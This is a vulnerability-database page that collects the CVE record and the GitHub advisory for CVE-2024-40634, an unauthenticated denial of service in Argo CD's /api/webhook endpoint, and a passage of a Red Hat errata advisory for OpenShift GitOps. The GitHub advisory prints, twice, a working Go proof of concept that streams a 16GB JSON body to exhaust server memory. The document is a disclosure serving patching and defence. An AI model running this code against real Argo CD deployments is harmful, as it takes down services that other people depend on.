Action not permitted
Modal body text goes here.
cve-2024-40634
Vulnerability from cvelistv5
Published
2024-07-22 17:22
Modified
2024-08-02 04:33
Severity
Summary
Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:argoproj:argo-cd:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "argo-cd",
"vendor": "argoproj",
"versions": [
{
"lessThan": "2.9.20",
"status": "affected",
"version": "1.0.0",
"versionType": "custom"
},
{
"lessThan": "2.10.15",
"status": "affected",
"version": "2.10.0",
"versionType": "custom"
},
{
"lessThan": "2.11.6",
"status": "affected",
"version": "2.11.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40634",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-23T13:12:57.451737Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-23T13:19:36.934Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:33:11.910Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "argo-cd",
"vendor": "argoproj",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.0, \u003c 2.9.20"
},
{
"status": "affected",
"version": "\u003e= 2.10.0, \u003c 2.10.15"
},
{
"status": "affected",
"version": "\u003e= 2.11.0, \u003c 2.11.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-22T17:22:55.732Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
}
],
"source": {
"advisory": "GHSA-jmvp-698c-4x3w",
"discovery": "UNKNOWN"
},
"title": "Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-40634",
"datePublished": "2024-07-22T17:22:55.732Z",
"dateReserved": "2024-07-08T16:13:15.511Z",
"dateUpdated": "2024-08-02T04:33:11.910Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-40634\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-07-22T18:15:03.770\",\"lastModified\":\"2024-07-24T12:55:13.223\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\\n\"},{\"lang\":\"es\",\"value\":\"Argo CD es una herramienta declarativa de entrega continua de GitOps para Kubernetes. Este informe detalla una vulnerabilidad de seguridad en Argo CD, donde un atacante no autenticado puede enviar un gran payload JSON especialmente manipulado al endpoint /api/webhook, lo que provoca una asignaci\u00f3n excesiva de memoria que conduce a la interrupci\u00f3n del servicio al desencadenar un Out Of Memory (OOM) kill. El problema plantea un alto riesgo para la disponibilidad de las implementaciones de Argo CD. Esta vulnerabilidad se solucion\u00f3 en 2.11.6, 2.10.15 y 2.9.20.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\",\"source\":\"security-advisories@github.com\"}]}}"
}
}
ghsa-jmvp-698c-4x3w
Vulnerability from github
Published
2024-07-22 17:20
Modified
2024-08-07 14:17
Severity
7.5 (High) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
8.7 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
8.7 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Summary
Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint
Details
Summary
This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
Details
The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.
The fix would be to enforce a limit on the size of the request being parsed.
PoC
Port-forward to the argocd-server service, like so:
console
kubectl port-forward svc/argocd-server -n argocd 8080:443
Run the below code:
```go package main
import ( "crypto/tls" "io" "net/http" )
// Define a custom io.Reader that generates a large dummy JSON payload. type DummyJSONReader struct { size int64 // Total size to generate read int64 // Bytes already generated }
// Read generates the next chunk of the dummy JSON payload. func (r *DummyJSONReader) Read(p []byte) (n int, err error) { if r.read >= r.size { return 0, io.EOF // Finished generating }
start := false
if r.read == 0 {
// Start of JSON
p[0] = '{'
p[1] = '"'
p[2] = 'd'
p[3] = 'a'
p[4] = 't'
p[5] = 'a'
p[6] = '"'
p[7] = ':'
p[8] = '"'
n = 9
start = true
}
for i := n; i < len(p); i++ {
if r.read+int64(i)-int64(n)+1 == r.size-1 {
// End of JSON
p[i] = '"'
p[i+1] = '}'
r.read += int64(i) + 2 - int64(n)
return i + 2 - n, nil
} else {
p[i] = 'x' // Dummy data
}
}
r.read += int64(len(p)) - int64(n)
if start {
return len(p), nil
}
return len(p) - n, nil
}
func main() { // Initialize the custom reader with the desired size (16GB in this case). payloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB reader := &DummyJSONReader{size: payloadSize}
// HTTP client setup
httpClient := &http.Client{
Timeout: 0, // No timeout
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
if err != nil {
panic(err)
}
// Set headers
req.Header.Set("Content-Type", "application/json")
req.Header.Set("X-GitHub-Event", "push")
resp, err := httpClient.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
println("Response status code:", resp.StatusCode)
} ```
Patches
A patch for this vulnerability has been released in the following Argo CD versions:
v2.11.6 v2.10.15 v2.9.20
For more information
If you have any questions or comments about this advisory:
Open an issue in the Argo CD issue tracker or discussions Join us on Slack in channel #argo-cd
Credits
This vulnerability was found & reported by Jakub Ciolek
The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.11.0"
},
{
"fixed": "2.11.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-40634"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-22T17:20:02Z",
"nvd_published_at": "2024-07-22T18:15:03Z",
"severity": "HIGH"
},
"details": "### Summary\nThis report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.\n\n### Details\nThe webhook server always listens to requests. By default, the endpoint doesn\u0027t require authentication. It\u0027s possible to send a large, malicious request with headers (in this case \"X-GitHub-Event: push\") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.\n\nThe fix would be to enforce a limit on the size of the request being parsed.\n\n### PoC\nPort-forward to the argocd-server service, like so:\n\n```console\nkubectl port-forward svc/argocd-server -n argocd 8080:443\n```\n\nRun the below code:\n\n```go\npackage main\n\nimport (\n\t\"crypto/tls\"\n\t\"io\"\n\t\"net/http\"\n)\n\n// Define a custom io.Reader that generates a large dummy JSON payload.\ntype DummyJSONReader struct {\n\tsize int64 // Total size to generate\n\tread int64 // Bytes already generated\n}\n\n// Read generates the next chunk of the dummy JSON payload.\nfunc (r *DummyJSONReader) Read(p []byte) (n int, err error) {\n\tif r.read \u003e= r.size {\n\t\treturn 0, io.EOF // Finished generating\n\t}\n\n\tstart := false\n\tif r.read == 0 {\n\t\t// Start of JSON\n\t\tp[0] = \u0027{\u0027\n\t\tp[1] = \u0027\"\u0027\n\t\tp[2] = \u0027d\u0027\n\t\tp[3] = \u0027a\u0027\n\t\tp[4] = \u0027t\u0027\n\t\tp[5] = \u0027a\u0027\n\t\tp[6] = \u0027\"\u0027\n\t\tp[7] = \u0027:\u0027\n\t\tp[8] = \u0027\"\u0027\n\t\tn = 9\n\t\tstart = true\n\t}\n\n\tfor i := n; i \u003c len(p); i++ {\n\t\tif r.read+int64(i)-int64(n)+1 == r.size-1 {\n\t\t\t// End of JSON\n\t\t\tp[i] = \u0027\"\u0027\n\t\t\tp[i+1] = \u0027}\u0027\n\t\t\tr.read += int64(i) + 2 - int64(n)\n\t\t\treturn i + 2 - n, nil\n\t\t} else {\n\t\t\tp[i] = \u0027x\u0027 // Dummy data\n\t\t}\n\t}\n\n\tr.read += int64(len(p)) - int64(n)\n\tif start {\n\t\treturn len(p), nil\n\t}\n\treturn len(p) - n, nil\n}\n\nfunc main() {\n\t// Initialize the custom reader with the desired size (16GB in this case).\n\tpayloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB\n\treader := \u0026DummyJSONReader{size: payloadSize}\n\n\t// HTTP client setup\n\thttpClient := \u0026http.Client{\n\t\tTimeout: 0, // No timeout\n\t\tTransport: \u0026http.Transport{\n\t\t\tTLSClientConfig: \u0026tls.Config{InsecureSkipVerify: true},\n\t\t},\n\t}\n\n\treq, err := http.NewRequest(\"POST\", \"https://localhost:8080/api/webhook\", reader)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Set headers\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-GitHub-Event\", \"push\")\n\n\tresp, err := httpClient.Do(req)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tprintln(\"Response status code:\", resp.StatusCode)\n}\n```\n\n### Patches\nA patch for this vulnerability has been released in the following Argo CD versions:\n\nv2.11.6\nv2.10.15\nv2.9.20\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\nJoin us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\nThis vulnerability was found \u0026 reported by Jakub Ciolek\n\nThe Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue\n",
"id": "GHSA-jmvp-698c-4x3w",
"modified": "2024-08-07T14:17:41Z",
"published": "2024-07-22T17:20:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2024-3002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint"
}
rhsa-2024_4972
Vulnerability from csaf_redhat
Published
2024-08-01 10:48
Modified
2024-09-16 20:16
Summary
Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.11.7 security update
Notes
Topic
An update is now available for Red Hat OpenShift GitOps v1.11.7. Red Hat
Product Security has rated this update as having a security impact of Important.
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Errata Advisory for Red Hat OpenShift GitOps v1.11.7.
Security Fix(es):
* openshift-gitops-argocd-container: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.11](CVE-2024-40634)
* openshift-gitops-container: Argo CD web terminal session doesn't expire [gitops-1.11](CVE-2023-40025)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat OpenShift GitOps v1.11.7. Red Hat\nProduct Security has rated this update as having a security impact of Important.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Errata Advisory for Red Hat OpenShift GitOps v1.11.7.\n\nSecurity Fix(es):\n\n* openshift-gitops-argocd-container: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.11](CVE-2024-40634)\n* openshift-gitops-container: Argo CD web terminal session doesn\u0027t expire [gitops-1.11](CVE-2023-40025)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat offerings.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4972",
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4972.json"
}
],
"title": "Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.11.7 security update",
"tracking": {
"current_release_date": "2024-09-16T20:16:06+00:00",
"generator": {
"date": "2024-09-16T20:16:06+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "3.33.3"
}
},
"id": "RHSA-2024:4972",
"initial_release_date": "2024-08-01T10:48:26+00:00",
"revision_history": [
{
"date": "2024-08-01T10:48:26+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-08-01T10:48:26+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-09-16T20:16:06+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.11",
"product": {
"name": "Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.11::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product_id": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-operator-bundle\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
